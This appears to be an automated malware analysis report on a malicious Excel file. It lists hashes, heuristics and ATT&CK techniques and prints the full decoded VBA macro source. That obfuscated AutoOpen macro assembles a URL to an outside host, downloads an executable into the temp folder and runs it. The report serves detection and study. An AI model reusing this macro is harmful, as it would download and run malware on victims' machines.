Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b1b9fe0a5aef655…

MALICIOUS

Office (OLE)

84.5 KB Created: 2016-12-13 14:47:12 Authoring application: Microsoft Excel First seen: 2017-03-05
MD5: af2ed617e2567ef55c6530708ab6813d SHA-1: 17d3ab0fca8a90d7e3cc933a36ee77e038e2598f SHA-256: 7b1b9fe0a5aef655cf3b397ecc291ca97a39c6675431512cacd944eeac4ca2a0
278 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer

The sample is a malicious Excel file containing VBA macros. It utilizes the URLDownloadToFile API to download a second-stage payload from a URL, which is then likely executed. The presence of the AutoOpen macro and the lure to enable macros indicate a deliberate attempt to trick the user into running the malicious code.

Heuristics 9

  • ClamAV: Xls.Malware.Agent-5772348-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Agent-5772348-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function bysgomq Lib "kernel32" (ByVal kikcogl As Variant, ByVal uskuhqi As Single, ByVal yqxig As Long, ByVal xodzidfe As Single, ByVal vnaves As String, ByVal iweb As Variant, ByVal zachevco As Byte, ByVal lxevig As Object) As Byte
Private Declare PtrSafe Function wqyfgowy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal irfusy As Long, ByVal pimiqje As String, ByVal ajujx As String, ByVal xirse As Long, ByVal saxqyhh As Long) As Long
Private Declare PtrSafe Function ykawg Lib "netapi32" (ByVal wkyqek As String, ByVal vixela As Currency, ByVal almijcubd As Integer, ByVal udezr As Double, ByVal jdijitze As Single, ByVal ejip As Object) As Boolean
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
kifmu = "open"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Case 14
ygeko = Environ(opebahu0()) & apapynz()
yvazju = wqyfgowy(hake, hqikbak(), ygeko, hake, hake)
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# Referenced by macro
    • http://ns.adobe.com/xap/1.0/Referenced by macro
    • http://ns.adobe.com/xap/1.0/mm/Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#Referenced by macro
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro
    • http://ns.adobe.com/photoshop/1.0/Referenced by macro
    • http://ns.adobe.com/tiff/1.0/Referenced by macro
    • http://ns.adobe.com/exif/1.0/Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8005 bytes
SHA-256: 6d815d1338a0097c792daf72eba4becbe00464660fe8da89aef9f509dbe14d80
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare PtrSafe Function vyxy Lib "gdi32" (ByVal avunq As Currency, ByVal hinhuq As Currency, ByVal qgupxozv As Variant, ByVal hydhyxo As Single, ByVal relyfka As Single, ByVal attibk As Byte) As Byte
Private Declare PtrSafe Function bysgomq Lib "kernel32" (ByVal kikcogl As Variant, ByVal uskuhqi As Single, ByVal yqxig As Long, ByVal xodzidfe As Single, ByVal vnaves As String, ByVal iweb As Variant, ByVal zachevco As Byte, ByVal lxevig As Object) As Byte
Private Declare PtrSafe Function wqyfgowy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal irfusy As Long, ByVal pimiqje As String, ByVal ajujx As String, ByVal xirse As Long, ByVal saxqyhh As Long) As Long
Private Declare PtrSafe Function ykawg Lib "netapi32" (ByVal wkyqek As String, ByVal vixela As Currency, ByVal almijcubd As Integer, ByVal udezr As Double, ByVal jdijitze As Single, ByVal ejip As Object) As Boolean
Private Declare PtrSafe Function bbakahde Lib "shell32.dll" Alias "ShellExecuteA" (ByVal oxwix As LongPtr, ByVal cesi As String, ByVal hidcura As String, ByVal meka As String, ByVal rotumg As String, ByVal vizmud As Long) As LongPtr
Private Declare PtrSafe Function aqsin Lib "advapi32" (ByVal fnylqa As Byte, ByVal almoju As Object, ByVal fxycduxz As String)
Private Declare PtrSafe Function ysino Lib "advapi32" Alias "sryhkinno" (ByVal pokjih As Byte, ByVal vamce As Variant, ByVal igymaf As Object, ByVal jbijizro As Byte, ByVal ercyma As Byte) As Long
Private Declare PtrSafe Function uviq Lib "gdi32" (ByVal cpelavja As Byte, ByVal uvxik As Variant, ByVal ovtuppu As Currency, ByVal osjehlel As Byte)
Private Declare PtrSafe Function uphyhp Lib "advapi32" Alias "riblowe" (ByVal eqakpo As Double, ByVal bagzet As Single, ByVal ujespew As String, ByVal sigca As String, ByVal ijodl As Currency, ByVal corynu As Variant, ByVal vzeclaw As Currency, ByVal qymup As Currency, ByVal etzyzy As Double) As Variant
Private Declare PtrSafe Function ygxuro Lib "netapi32" Alias "glevzylu" (ByVal vomax As Object, ByVal byvri As Integer, ByVal ezhetwa As Variant, ByVal jiqi As Object, ByVal eccipli As Single, ByVal wbexkij As Single, ByVal dfohtiw As Long, ByVal edyv As String) As Double
Private Declare PtrSafe Function esmemov Lib "user32" Alias "oxkokxazj" (ByVal oricylw As Variant, ByVal koni As Variant, ByVal nejhi As Byte)
Private Declare PtrSafe Function odip Lib "kernel32" (ByVal isyfbodf As Currency, ByVal duhbukv As Boolean, ByVal odsile As Currency, ByVal ikpody As Single, ByVal vefavo As Byte, ByVal btapub As Variant)
Function ibbityv()
qyjonnysijqeqorqalygemxyhn = 2406
ibbityv = "te"
End Function

Function evtukabo()
vutxyxiwdenawyqububkiqgizib = 2306
evtukabo = "mp"
End Function

Function nejomji()
ecozgobbytenvikrajzajlyvxewka = 2740
nejomji = "\ml"
End Function

Function uwzovy()
owybomjihofxyjcozokkipbewo = 2452
uwzovy = "ula"
End Function

Function ysgaca()
acqofepudupobcetbajgygbaqu = 2364
ysgaca = "vxy"
End Function

Function lsymdabaj()
humseshabizercafeginiwu = 2078
lsymdabaj = ".ex"
End Function

Function uzmavazb()
sryxcamutpodvotdyzzibcovgofqydpedw = 2786
uzmavazb = "e"
End Function

Function ycyqg()
bcuvarfobvypaweseqavepga = 2259
ycyqg = "ht"
End Function

Function gowesd()
edkerqisjawjupovermiqevcujuzfomr = 2354
gowesd = "tp"
End Function

Function lovkycl()
afyzarwomheqotanwapeqryvw = 2219
lovkycl = ":/"
End Function

Function msigullefh()
merdicezivjivsujgavgyxacted = 2653
msigullefh = "/r"
End Function

Function uvufe()
yqhuvqyvvuxidqizevzuficyjsije = 2837
uvufe = "ey"
End Function

Function obziq()
dhicipinehpyvrugkaterticvyhetpe = 2932
obziq = "tr"
End Function

Function davyb()
emahmohipojehosqalymasfe = 2784
davyb = "yd"
End Function

Function evohdilu()
sisnextumwusedcakgiqdojifdesemy = 2717
evohdilu = "r."
End Function

Function cxibok()
lotzafhyzcyxoppyccogwibwiqkypeg = 2188
cxibok = "to"
End Function

Function osijh()
icpojqilbaguhwubisucamip = 2005
osijh = "p/"
End Function

Function imanfawq()
kuwmonubaparifossypojyctulsa = 2146
imanfawq = "of"
End Function

Function eslox()
vesuhdaxepujvoxyrkojotjacukwy = 2636
eslox = "fi"
End Function

Function uveqwavde()
nejojudborikupnoravipu = 2946
uveqwavde = "cs"
End Function

Function ludnudupv()
uwjemnixxosjacupisahyruna = 2557
ludnudupv = "em"
End Function

Function ajax()
ehenwepjegsobcyflutryqbyhdibquxbit = 2039
ajax = "gm"
End Function

Function cima()
uwlycdyxxendujolinuzygudexev = 2840
cima = "te"
End Function

Function vepe()
impicilorutuzniginpibqacsit = 2734
vepe = ".e"
End Function

Function ixfywnox()
rafwybwyfjoztermujerehnikojif = 2329
ixfywnox = "xe"
End Function

Function vomexyjl()
ruwyry = "2476"
vomexyjl = ruwyry
End Function

Function vqomofif()
vqomofif = Empty
End Function

Function xridpek()
fokcetvoj = Empty
xridpek = fokcetvoj
End Function

Function opebahu0()
jsemvydwe = "vwuckuk"
opebahu0 = ibbityv() & evtukabo()
End Function

Function apapynz()
ujhexebs = "fsaffefq"
apapynz = nejomji() & uwzovy() & ysgaca() & lsymdabaj() & uzmavazb()
End Function

Function hqikbak()
inabo = "essecgevpef"
hqikbak = ycyqg() & gowesd() & lovkycl() & msigullefh() & uvufe() & obziq() & davyb() & evohdilu() & cxibok() & osijh() & imanfawq() & eslox() & uveqwavde() & ludnudupv() & ajax() & cima() & vepe() & ixfywnox()
End Function

Sub AutoOpen()
kifmu = "open"
qedivl = "utrizuna"
eqat = "aqefbe"
simme = ""
fyksi = "agtyhjy"
olpahydif = "vmagokmi"
trutuk = "23295"
hake = 0
alyj = "98647"
ywansone = 14
Select Case ywansone
Case Empty
If (olpahydif = "ucyru") Then
If (vomexyjl = "2476") Then
kuzad = Empty
meqjujdy = "lcutzikf"
hkuwzufu = "evokuh"
lrada = meqjujdy & fyksi + hkuwzufu & qedivl
wtegarso = False
sbidybbo = "24428"
vywky = sbidybbo & "ikve"
End If

End If
If (vqomofif = "evorod") Then
ajleta = Empty

End If
If (xridpek = 998) Then
hcefnonvan = Empty
If (TypeName(hcefnonvan) = "Empty") Then
wxetguwqaxd = Empty
vubegc = Empty
yhanhurk = alyj & eqat & "32295" + trutuk
End If

End If

Case 14
ygeko = Environ(opebahu0()) & apapynz()
yvazju = wqyfgowy(hake, hqikbak(), ygeko, hake, hake)
If yvazju = 0 Then
ehqespe = bbakahde(hake, kifmu, ygeko, simme, simme, hake)
End If

Case Null
If (olpahydif = "ucyru") Then
If (vomexyjl = "2476") Then
kuzad = Empty
meqjujdy = "lcutzikf"
hkuwzufu = "evokuh"
lrada = meqjujdy & fyksi + hkuwzufu & qedivl
wtegarso = False
sbidybbo = "24428"
vywky = sbidybbo & "ikve"
End If

End If
If (vqomofif = "evorod") Then
ajleta = Empty

End If
If (xridpek = 998) Then
hcefnonvan = Empty
If (TypeName(hcefnonvan) = "Empty") Then
wxetguwqaxd = Empty
vubegc = Empty
yhanhurk = alyj & eqat & "32295" + trutuk
End If

End If

Case "75143"
If (olpahydif = "ucyru") Then
If (vomexyjl = "2476") Then
kuzad = Empty
meqjujdy = "lcutzikf"
hkuwzufu = "evokuh"
lrada = meqjujdy & fyksi + hkuwzufu & qedivl
wtegarso = False
sbidybbo = "24428"
vywky = sbidybbo & "ikve"
End If

End If
If (vqomofif = "evorod") Then
ajleta = Empty

End If
If (xridpek = 998) Then
hcefnonvan = Empty
If (TypeName(hcefnonvan) = "Empty") Then
wxetguwqaxd = Empty
vubegc = Empty
yhanhurk = alyj & eqat & "32295" + trutuk
End If

End If

End Select

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.